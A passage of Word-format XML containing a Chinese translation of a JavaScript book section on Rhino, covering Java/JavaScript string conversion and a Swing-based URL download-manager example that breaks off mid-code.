      <w:r>
        <w:t>字符串，但这可能也是个绊脚石，因为像</w:t>
      </w:r>
      <w:r>
        <w:t>java.lang.String</w:t>
      </w:r>
      <w:r>
        <w:t>对象这样的</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>字符串不能转换回</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串。注意前面出现过的这行代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var version=java.lang.System.getProperty("java.version");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用这行代</w:t>
      </w:r>
      <w:r>
        <w:t>码后，变量</w:t>
      </w:r>
      <w:r>
        <w:t>version</w:t>
      </w:r>
      <w:r>
        <w:t>保存了一个</w:t>
      </w:r>
      <w:r>
        <w:t>java.lang.String</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这行代码的行为看起来像</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，其实区别巨大。首先，</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>字符串有</w:t>
      </w:r>
      <w:r>
        <w:t>length()</w:t>
      </w:r>
      <w:r>
        <w:t>方法而没有</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性。其次，对</w:t>
      </w:r>
      <w:r>
        <w:t>Ja</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>va</w:t>
      </w:r>
      <w:r>
        <w:t>字符串进行</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算得到的结果是</w:t>
      </w:r>
      <w:r>
        <w:t>"object"</w:t>
      </w:r>
      <w:r>
        <w:t>。无法通过调用其</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法把</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>字符串转换成</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，因为所有的</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>对象都有自己的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，后者返回</w:t>
      </w:r>
      <w:r>
        <w:t>java.lang.String</w:t>
      </w:r>
      <w:r>
        <w:t>。为了把</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>值转换成字符串，请将它传递给</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>Script</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var version=String(java.lang.System.getProperty("java.version"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="296" w:name="RhinoShi_Li_"/>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="296"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:t>12-1</w:t>
      </w:r>
      <w:r>
        <w:t>是一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>应用，它演示了前面介绍的很多特性和技术。本示例使用</w:t>
      </w:r>
      <w:r>
        <w:t>javax.swing GUI</w:t>
      </w:r>
      <w:r>
        <w:t>包、</w:t>
      </w:r>
      <w:r>
        <w:t>java.net</w:t>
      </w:r>
      <w:r>
        <w:t>网络包、</w:t>
      </w:r>
      <w:r>
        <w:t>java.io</w:t>
      </w:r>
      <w:r>
        <w:t>流的输入</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>输出（</w:t>
      </w:r>
      <w:r>
        <w:t>I/O</w:t>
      </w:r>
      <w:r>
        <w:t>）包和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的多线程功能实现一个简单的下载管理器应用，它把对应</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的文件下载到本地，并在下载时显示下载进度。图</w:t>
      </w:r>
      <w:r>
        <w:t>12-1</w:t>
      </w:r>
      <w:r>
        <w:t>展示了当两个下载挂起时</w:t>
      </w:r>
      <w:r>
        <w:t>应用的大致样子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4045788" cy="621101"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="23" name="00023.jpeg" descr="00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00023.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4045788" cy="621101"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>12-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　使用</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>创建的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">GUI </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:t>12-1</w:t>
      </w:r>
      <w:r>
        <w:t>：用</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>实现的下载管理器应用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>使用简单的</w:t>
      </w:r>
      <w:r>
        <w:t>Java GUI</w:t>
      </w:r>
      <w:r>
        <w:t>实现下载管理器应用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>导入</w:t>
      </w:r>
      <w:r>
        <w:t>Swing GUI</w:t>
      </w:r>
      <w:r>
        <w:t>组件和一些其他组件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>importPackage(javax.swing);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>importClass(javax.swing.border.EmptyBorder);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>importClass(java.awt.event.ActionListener);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>importClass(java.net.URL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>importClass(java.io.FileOutputStream);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>importClass(java.lang.Thread);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一些</w:t>
      </w:r>
      <w:r>
        <w:t>GUI</w:t>
      </w:r>
      <w:r>
        <w:t>小部件（</w:t>
      </w:r>
      <w:r>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var frame=new JFrame("Rhino URL Fetcher");//</w:t>
      </w:r>
      <w:r>
        <w:t>应用窗体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var urlfield=new JTextField(30);//URL</w:t>
      </w:r>
      <w:r>
        <w:t>输入字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var button=new JButton("Download");//</w:t>
      </w:r>
      <w:r>
        <w:t>开始下载的按钮</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var filechooser=new JFileChoos</w:t>
      </w:r>
      <w:r>
        <w:t>er();//</w:t>
      </w:r>
      <w:r>
        <w:t>文件选择对话框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var row=Box.createHorizontalBox();//</w:t>
      </w:r>
      <w:r>
        <w:t>用于放置字段和按钮的方框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var col=Box.createVerticalBox();//</w:t>
      </w:r>
      <w:r>
        <w:t>用于放置数据行和进度条</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var padding=new EmptyBorder(3,3,3,3);//</w:t>
      </w:r>
      <w:r>
        <w:t>填充数据行的空白</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>把它们组装一起并显示这个</w:t>
      </w:r>
      <w:r>
        <w:t>GUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>row.add(urlfield);//</w:t>
      </w:r>
      <w:r>
        <w:t>把输入字段放入行中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>row.add(button);//</w:t>
      </w:r>
      <w:r>
        <w:t>把按钮放入行中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>col.add(row);//</w:t>
      </w:r>
      <w:r>
        <w:t>把行放入列中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>fr</w:t>
      </w:r>
      <w:r>
        <w:t>ame.add(col);//</w:t>
      </w:r>
      <w:r>
        <w:t>把列放入窗体中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>row.setBorder(padding);//</w:t>
      </w:r>
      <w:r>
        <w:t>为行增加一些空白</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.pack();//</w:t>
      </w:r>
      <w:r>
        <w:t>设置为最小值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.visible=true;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置窗体可见</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当窗体中发生任何事件都会调用这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.addWindowListener(function(e,name){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果用户关闭窗体，退出这个应用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(name==="windowClosing")//Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>加入了</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>java.lang.System.exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>当用户单击按钮时，调用这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>button.addActionListener(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{//</w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t>java.net.URL</w:t>
      </w:r>
      <w:r>
        <w:t>表示源</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//(</w:t>
      </w:r>
      <w:r>
        <w:t>这会检查用户的输入是否符合语法规则</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url=new URL(urlfield.text);//</w:t>
      </w:r>
      <w:r>
        <w:t>告诉用户选择保存</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>内容的文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var response=filechooser.showSaveDialog(frame);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果单击</w:t>
      </w:r>
      <w:r>
        <w:t>Cancel</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，立即退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(response!=JFileChooser.APPROV</w:t>
      </w:r>
      <w:r>
        <w:t>E_OPTION)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，获取</w:t>
      </w:r>
      <w:r>
        <w:t>java.io.File</w:t>
      </w:r>
      <w:r>
        <w:t>表示目标文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var file=filechooser.getSelectedFile();//</w:t>
      </w:r>
      <w:r>
        <w:t>现在启动一个新线程下载</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new java.lang.Thread(function(){download(url,file);}).start();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果出现错误，显示一个对话框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>JOptionPane.showMessageDialog(frame,e.message,"Exception",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>JOptionP</w:t>
      </w:r>
      <w:r>
        <w:t>ane.ERROR_MESSAGE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>java.net.URL</w:t>
      </w:r>
      <w:r>
        <w:t>等下载</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容，使用</w:t>
      </w:r>
      <w:r>
        <w:t>java.io.File</w:t>
      </w:r>
      <w:r>
        <w:t>等把内容保存到一个文件中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JProgressBar</w:t>
      </w:r>
      <w:r>
        <w:t>组件中显示下载进度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这将在一个新线程中调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function download(url,file){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{//</w:t>
      </w:r>
      <w:r>
        <w:t>每次下载一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>时，我们会添加一个新的数据行到窗体中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>数据行中会显示</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>、文件名和下载进度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var row=Box.createHorizontalBox();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建数据行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>row.setBorde</w:t>
      </w:r>
      <w:r>
        <w:t>r(padding);//</w:t>
      </w:r>
      <w:r>
        <w:t>填充它的空白</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var label=url.toString()+":";//</w:t>
      </w:r>
      <w:r>
        <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>row.add(new JLabel(label));//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Jlabel</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bar=new JProgressBar(0,100);//</w:t>
      </w:r>
      <w:r>
        <w:t>加入进度条</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bar.stringPainted=true;//</w:t>
      </w:r>
      <w:r>
        <w:t>显示文件名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bar.string=file.toString();//</w:t>
      </w:r>
      <w:r>
        <w:t>在进度条中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>row.add(bar);//</w:t>
      </w:r>
      <w:r>
        <w:t>把进度条加入新的行中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>col.add(row);//</w:t>
      </w:r>
      <w:r>
        <w:t>把数据行加入列中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.pack();//</w:t>
      </w:r>
      <w:r>
        <w:t>调整窗体大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们不知道</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的大小，所以进度条是动画</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bar.indeterminate=true;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果可能，立即连接服务器并获取</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的长度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var conn=url.openConnection();//</w:t>
      </w:r>
      <w:r>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:t>java.net.URLConnection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>conn.connect();//</w:t>
      </w:r>
      <w:r>
        <w:t>连接且等待连接头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var len=conn.contentLength;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果能得到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>长度就设置</w:t>
